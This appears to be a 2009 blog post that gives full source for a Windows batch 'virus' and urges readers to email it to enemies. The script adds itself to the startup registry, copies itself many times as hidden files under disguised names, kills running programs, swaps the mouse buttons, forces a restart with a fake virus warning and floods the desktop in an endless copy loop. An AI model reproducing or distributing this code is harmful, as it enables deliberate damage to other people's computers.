Sunday, September 6, 2009

virus Batch file: dont try on ur computer

copy the below code and paste into your notepad.. then save as anyname.bat

Do not click on that batch file........ Send it your enimies email...

It will
1) Copy itself into startup
2) Copy itself over one thousand times into random spots in your computer
3) Hide its self and all other created files
4) Task kill MSN, Norton, Windows Explorer, Limewire.
5) Swap the left mouse button with the right one
6) Opens alert boxes
7) Changes the time to 12:00 and shuts down the computer

Code :-

@Echo off
color 4
title 4
title LALIT
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat LALIT.bat
copy Greatgame.bat LALIT.jpg
copy Greatgame.bat LALIT.txt
copy Greatgame.bat LALIT.exe
copy Greatgame.bat LALIT.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat LALIT.bat
copy Greatgame.bat LALIT.jpg
copy Greatgame.bat LALIT.txt
copy Greatgame.bat LALIT.exe
copy Greatgame.bat LALIT.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * LALIT
msg * LALIT
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:LALIT
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto LALIT

No comments:

Post a Comment